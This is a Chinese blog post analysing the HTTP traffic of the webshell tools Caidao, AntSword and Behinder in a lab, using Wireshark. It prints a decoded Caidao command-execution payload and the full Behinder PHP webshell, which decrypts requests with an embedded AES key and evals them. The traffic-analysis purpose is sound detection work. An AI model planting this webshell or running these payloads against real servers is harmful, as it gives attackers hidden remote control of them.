http流量分析

最新推荐文章于 2024-09-28 11:03:51 发布
最新推荐文章于 2024-09-28 11:03:51 发布
阅读量297 收藏 1
点赞数 1
文章标签: 开发语言 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45014174/article/details/129279880
版权
文章详细介绍了在Windows10环境下,使用菜刀、蚁剑和冰蝎工具对Apache服务进行流量分析的过程。通过Wireshark捕获HTTP流量,展示了如何解码并执行shell命令,以及这些工具如何处理加密通讯以逃避检测。内容涉及PHP版本限制、编码解码方法以及服务器端脚本加密功能。
摘要由CSDN通过智能技术生成

1.菜刀流量分析

环境:windows10,菜刀,kali,apache2服务

systemctl restart apache2.server //开启Apache2服务

cd /var/www/html

vim shell.php

service --status-all | grep apache2 //查看Apache是否启动

在win10上访问1.php文件

先用菜刀连接上靶场环境,在打开wireshark,过滤掉http包,在菜刀上打开虚拟终端,输入一下命令。

回到wireshark上追踪靶场机的http流

用bash64进行解码

解码前:QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nL2Jpbi9zaCc7JHM9J2NkIC92YXIvd3d3L2h0bWwvO25ldHN0YXQgLWFuIHwgZ3JlcCBFU1RBQkxJU0hFRDtlY2hvIFtTXTtwd2Q7ZWNobyBbRV0nOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjskYXJyYXk9YXJyYXkoYXJyYXkoInBpcGUiLCJyIiksYXJyYXkoInBpcGUiLCJ3IiksYXJyYXkoInBpcGUiLCJ3IikpOyRmcD1wcm9jX29wZW4oJHIuIiAyPiYxIiwkYXJyYXksJHBpcGVzKTskcmV0PXN0cmVhbV9nZXRfY29udGVudHMoJHBpcGVzWzFdKTtwcm9jX2Nsb3NlKCRmcCk7cHJpbnQgJHJldDs7ZWNobygiWEBZIik7ZGllKCk7

解码后:

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/;netstat -an | grep ESTABLISHED;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();

注:因为PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用报错,要找到菜刀的配置文件进行修改

2.蚁剑流量分析

还是和菜刀一样的靶场环境

访问http://192.168.188.177/shell.php,发现没有报错,打开蚁剑连接

还是一样使用wireshark进行抓取http包,进入到虚拟终端中任意使用一条命令,在对抓取到的http数据包进行分析。

蚁剑使用URL解码,也可设置其他的编码器

3.冰蝎流量分析

冰蝎利用了服务器端的脚本语言加密功能,通讯的过程中,消息体内容采用 AES 加密,基于特征值检测的安全产品无法查出,要连接的条件是上次冰蝎自带的webshell(冰蝎的server目录里能找到)

<?php

@error_reporting(0);

session_start();

$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond

$_SESSION['k']=$key;

session_write_close();

$post=file_get_contents("php://input");

if(!extension_loaded('openssl'))

{

$t="base64_"."decode";

$post=$t($post."");

for($i=0;$i<strlen($post);$i++) {

$post[$i] = $post[$i]^$key[$i+1&15];

}

}

else

{

$post=openssl_decrypt($post, "AES128", $key);

}

$arr=explode('|',$post);

$func=$arr[0];

$params=$arr[1];

class C{public function __invoke($p) {eval($p."");}}

@call_user_func(new C(),$params);

?>

靶场环境和上面的是一致的,在网站根目录下创建了一个shell1.php文件,我们在浏览器上打开次路径

打开wireshark进行抓包,用冰蝎进行连接,并在虚拟终端输入几天命名产生http交互。

解码发现有assert | 后面有base64_decode,意思是隔断|后面的内容将这后面的代码进行一次base64解码

解码后

@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
$key = $_SESSION['k'];
echo encrypt(json_encode($result),$key);
}
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$content="eURHZnpzQ3d1WHpXOVZLWDVCeWpkZHBBSzd1S0JiTEhwNXZoNDVIR0NKTHROWVZ3M1lGQTFKam03SGhhQ0NkUkZuUlhJbFNOVENkMGtwUUplVXF3WUVzaE1ROEpMeFlNQTQxN2JBVms2WUlWdUh0d0pOVXY0NTBzWWcwaUo3RjNoYXhuZ29pYlNYelRxR3lWVE9mQU9JYTRCaHBwVVZ0b2lDSlNISkFEV3g5QWpES3J2dGRqUzJaejhRM3hQM0tGbXJ6eWVOdUJ0ZU5TdnJSMFlDOXVFR09JeFJXOUtKRVJ2ZEl4aEQzVGNsMndmdFNVWGJENWNWM3NCUDVaSWhRUXVVTE96VDVBSWFmV3h3UlRqU2VqTTZRQngxUkpGQ3pxR0dVZkxTNmptZHZHMU9WSThwMGFrYk5tZ01Zc1NkUlpVdGpNRlRhMXlEWWZad0xFTG9sSThsTEd6dFFwSVV4bzJPc1REWW5lclJyNTNETGlLbXNNQXhCc1JxVzV2RjJ3eXpVdElNdjM3OW1lZHU0RWs3MmE0ZTBDRklnWFBhSWlIcTJPRlNOempvZmVIb3lqclZKcTQ3eFNHTFU0UWdMU0lOc1NRamo2alk3dUwxVVMySEpZaVVlb0ZOSTFnV2FIeGpSWTJBa0l1TFJVTlVjQnh1aDdSY1J0M3E2S1VTR0dJRTl5NkM5dW5jbGExQ1VqbDJiNFhlR05acE9UbFlkWE1WeWd3bThvUkRmNXZhZWw0NjczOVp5eXFrWFA1ZDhmTUJqeFB5Mkk2bjRCNTUxVnI4ZWtkNDB6RDE1bXF0UG5mUG1aVk5IMlV0QzZmdk91SmJwblVGZDV5SWVab1RDcnJrNnlpT1JLNjBMNzRsSXh0OUkyU1ZickV2Z1U0U3BzTE1ORFhvdWkzVnVpMjM0cW83RnZGSFlHTDNjeFFLVW5ScVJ3eVo0UTJHcTdjQm9rMVlCSGI0TUtzUUhYdHFMQkFNcDk0bURJb2dEdlVqSFFOa1pqQW45TFpDdnlQNzBZRzJjN0RSQThMYkpvUHZkOVl6RDNjQmxXM2hkS2x1cjNxR0UwVHk4UGxycDhQYUgxdWtSUEhIeERwN1YzZkl5ZFZaNU9NOVU2WjBsTjJDU3RzMVA5OVhiS0lvMTNEUzhLc0JpVXdKU3I3WGhzQ1l3OFN5RWF5c3NwSnFrSGh4dFZlNGRZOW13Rk8yRjVXdFFvZXp6NjR4cGJ0SVd3WGxzV0NhVnduYm1ZSWh6VWwyaTBGRzB2Vm9JcEhXa21YM1VRbERJbUpRRjcwd09VOGlQU2oxTEFOR1U0R0NRUFR1MUFtb0NBZmR1dFdyRlZDOXdWSDAweFkyNEdQVEdmRlA5SFFpVUxraTZCWGZGYzV1c21xbWkwN1Y4T1Y0enlQVHhtdGoxZ2l1cnIwVjVUQkVFV0JwRWJ3ZUlWYlg4ajEwaVQ5OHoxMGZoUXczbktpNWlBdHhFRGNnemhSOUgwUXB2STF3RXlVMGE5THdoalp5dWE5WTJpdm9mcEdhS3RPeEFZRlBsNUg4V090cjRhcERLdnVHM2dpNFBVTXJXbFFPTGRSZW9jOElIYWJZZWk4UmJ3REcyVVZKQXdBOFZJeWZ4VHBrZnliYXc2TUdCTnYyUkpqcXhJQ1NPbzRTdTFoQ0Y4aWxiUVBuNjZNbUNnS2dYR3JzVXZOV3daM2lvVVhtVDNzQkZnWFk5N3pRWmJQNE5Xc3dwM0NFaTlXRVNwemJkbERVNTRQaXBHRVlZMHhjVzM3bkpJeFE5ZmVLSzhHYjNMa0t2bVA0UlRXc0FBQUxSTFpEWE1nN3NtSXpVSmdaRnJFTUdneFYyUkVtcUxwTDZzbzNmYnJDTlJwV01qRDlKZVNhdGxwT1pQdTFSTmtjQVBWQ3ZhVUkwZTBEV2Q1czYzSkVqZHkzOHl6THFJdmpGREd6NEl6MjZ0bVpKUDhXTGFRZVJ5M3BKU3Q2cXAyRWlYS05yajRha21nRGRzQXVHcXU1OGhJSHJhMENBUVY2SGZIa094TVZpTWRWUkR4NWprRzdvV1l0YlpYcTFYNU5HU2FwTk1IWVp0SWtMN0pQRm1GM1RCcGNuTjBtb0ZvNFRUcWtPWVVnWTNpd3R5OHpiUnhJZk53QW5IcHgwQVBhVE9hUFVjeE1ybmtFb09SZzRpaHJvT1ZoZ2t0R25HaTV0S2RHV3F4MEVvazFRTjlUdTFmNUNhVDFQWWxjNFVaOHVJbW1vdFVWWTViY0tlVWhqek1nVEdpS1Nha0MzQzR1TjVpaENuR3VlUlJuSEdiZndmYU5pYVliMHB6R2EyNE02cHNNbEV0Q1lvMDVYQzBSaWRXeVJnajBlTmZmNGx6dEllaFNiSU5ZV3MzeU9JRllOZXlac0R0S3FGNUZCMUlnM2U2UU8xRVZqdTRVcWpWSEF6cTA0ZEdvQk92RWlJU2dxR2tmc3ljdWdodmpLVU9uekJSaTFhZWhKWVkwd2tYaGVRUGZsOE5sZ1lkMXZQanBXRTNyUG56OE1pNElBT24yQkkwTkZUQlZEb0IxYmNFemx2RzVPYVZsMjdNNnpQYVltN3JEZXYycjlWNjFhTEZjOGhkWXNwaVZGa2NOb3E0eHpNWjVtUU1keW9KTDRnbVBSR3I4bnNRbEZ4VmNSRnZTcEV5OHJjYk1Xd1RENHFaSFNQaVc2M3RTWnpKV1NPVko3RHQwUjBOOU5EaFBqRFVUNXhZa0pQNzk0SkJrM1B5Y2E4aktpMFVibUU1Q3pvbjZZMnlBUXQ1Y3F0ajJrdlF1WG1qMU41alZsd2hnS1hQV0dWQ09FMVh3VlN5VEx6Z213ZnRwV3Q4NFBUbzNGbTRvNzNxeUZ4WUxPdWhKd0tCVzlZM3lUR1duVjRTVFpraGpBdW5jWlJwZHlPem9xcDFVOEFLWHZES2V0QWpZOHJBOGlaRk1uUktrQ3Y3UEZLN1k4UW5JYkFnZTlIdWc4bHZTWlpuOWVNMlNFV1FpWjM5Z3BhY0I5dnVLOHd6UzNvYjdaZFhSWVZFQ1VDZE1oQVlDcVJMb2RXUUgzb0xnMFpp";$content=base64_decode($content);
main($content);
|Print_r("‮("
关注
专栏目录
流量分析-embarrass
11-08
在IT行业中,流量分析是一项至关重要的技能,尤其是在网络安全、网络优化和故障排查等领域。本案例中的"流量分析-embarrass"主题,暗示我们将探讨的是一个关于网络流量数据的分析问题,可能涉及到网络监控、入侵检测...
Web安全—流量分析(墨者靶场)
weixin_44431280的博客
03-14 2691
Web安全—流量分析(墨者靶场) 提要:本文主要记录墨者靶场中流量分析(电子取证)的思路过程,注重学习思路过程并非问题答案。 问题说明: 分析数据包找出上传Webshell的IP地址,数据包可在下载 分析思路: 使用Wireshark打开数据包,wireshark使用可参考文章Web安全工具—WireShark使用 方法一: 1,因为题目已说明是webshell上传,同时文件上传通常使用post请求方法,所以我们只需要分析http协议流量,过滤请求方法为post的http流量: 过滤表达式:http.re
Wireshark入门与进阶系列九之HTTP流量分析
热门推荐
煜铭2011
08-05 1万+
0x00 前言     Wireshark(前称Ethereal)中文版是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
应急靶场(9):【玄机】流量特征分析-小王公司收到的钓鱼邮件
OneMoreThink
07-23 374
目录恶意程序访问了内嵌 URL 获取了 zip 压缩包,该 URL 是什么?获取到的 zip 压缩包的 MD5 是什么?zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序, 该域名是什么?靶场地址:https://xj.edisec.net/challenges/58靶场背景:应急响应工程师小王在 WAF 上发现了一段恶意流量,请分析流量且提交对应 FLAG。一、...
纵横网络靶场-简单流量分析-ICMP协议分析
m0_68113265的博客
10-16 500
不久前,运维人员在日常安全检查的时候发现现场某设备会不时向某不知名ip发出非正常的ICMP PING包。这引起了运维人员的注意,他在过滤出ICMP包分析并马上开始做应急处理很可能已被攻击的设备。某厂区遭到黑客恶意扫描,此为安全设备截取的一部分流量包,请尝试分析该流量文件,帮助安全人员找到黑客的行为轨迹,并找到隐藏的FLAG,flag形式为 flag{}data内容为base编码,尝试解码之后为乱码。先tshark提取请求的ip地址的data内容(同个请求和应答都是相同内容)再输入字段形式。
【甄选靶场】Vulnhub百个项目渗透——项目七:DerpNStink-1(sql注入,流量分析
人间体佐菲的博客
08-23 2340
【专为新人甄选】Vulnhub百个项目渗透——项目七:DerpNStink-1
玄机靶场:蚁剑流量分析
最新发布
hubhubb的博客
09-28 364
这里使用玄机蚁剑流量分析靶场。
常见web漏洞的流量分析
一个努力学习网安的小牛马
12-10 985
【代码】常见web漏洞的流量分析
一道冰蝎文件流量分析的例题
09-01
网络安全领域,尤其是CTF(Capture The Flag)竞赛中,冰蝎经常被用于流量分析、数据包嗅探和网络取证。本题目的核心是利用冰蝎进行文件流量分析。 首先,我们要理解什么是文件流量分析。文件流量分析网络安全...
流量分析工具Wireshark32.zip
05-28
作为流量分析工具,它能够捕获并显示网络通信数据的详细信息,帮助用户深入理解网络流量的行为和模式。 Wireshark的核心功能在于其封包捕获能力。通过与操作系统底层的网络接口驱动交互,Wireshark可以实时获取到...
https流量解析
06-03
https流量解析,图形界面,可直观的查看当前https代理的流量
流量分析题.docx
12-02
流量分析题(中职) 流量分析是一种网络流量监控和分析技术,旨在对网络流量进行监控、记录和分析,以获取网络流量信息。流量分析通常用于网络安全、网络优化和网络故障诊断等领域。 知识点1:流量包DOWNLOAD和 ...
流量分析系统源数据
06-16
流量分析系统的数据源,大概有60M左右,有上万条用户网页访问记录,这里主要用于数据分析的案例数据源使用。具体使用方法可以参考我的博客。 博客地址:http://blog.csdn.net/sdksdk0/article/details/51691862
29-5 webshell 流量分析 - 菜刀
2401_83974087的博客
04-11 1020
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!一些笔者自己买的、其他平台白嫖不到的视频教程。
BUUCTF——大流量分析一、二、三题
人若无名,便可专心练剑
05-14 695
我们可以看到除了几个172开头的内网IP地址,就是183.129.152.140这个IP出现的频率最高了,所以我们怀疑这个就是攻击者的IP地址。题目说黑客攻击了A公司,那么进行攻击,且我们手上目前又有攻击留下的数据包,那么里面肯定有很多攻击IP与我们内网IP有交互的。如果是做题目嘛,那么我们就可以把这个地址直接提交,看看是不是正确的,但是真实的工作环境下,我们需要再进行确认下。某黑客对A公司发动了攻击,以下是一段时间内我们获取到的流量包,那黑客预留的后门的文件名是什么?
玄机靶场 通关笔记
weixin_44807430的博客
05-19 901
玄机靶场第六章tomcat流量特征分析-常见攻击事件。玄机靶场第三章权限维持-liux权限维持-隐藏。玄机靶场第二章日志分析redis))应急响,玄机靶场第六章流量特征分析-蚁剑流量分析。玄机靶场第五章inux实战-挖矿。玄机靶场linux,入侵分析。玄机靶场apache日志分析。玄机靶场webshell排查。玄机靶场win10等保。玄机靶场mysql应急。
流量统计
fengyuyaoye1980的专栏
12-19 326
/prco/uid_stat 目录,此目录主要保存各个应用的流量统计信息。
http数据流分析
weixin_33972649的博客
11-01 1972
http数据流分析 http请求报文结构:请求行、首部、空行、主体。 如下图: 请求行分为:请求方法、url、协议版本 1、常用请求方法有如下几种: GET:从服务器获取一份文档 HEAD:只从服务器获取文档的首部 POST:向服务器发送需要处理的数据,常用于表单提交。 PUT:将请求的主体部分存储在服务器上,从服务器上向客户发送文档 TRACE:对可能经过代理服...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值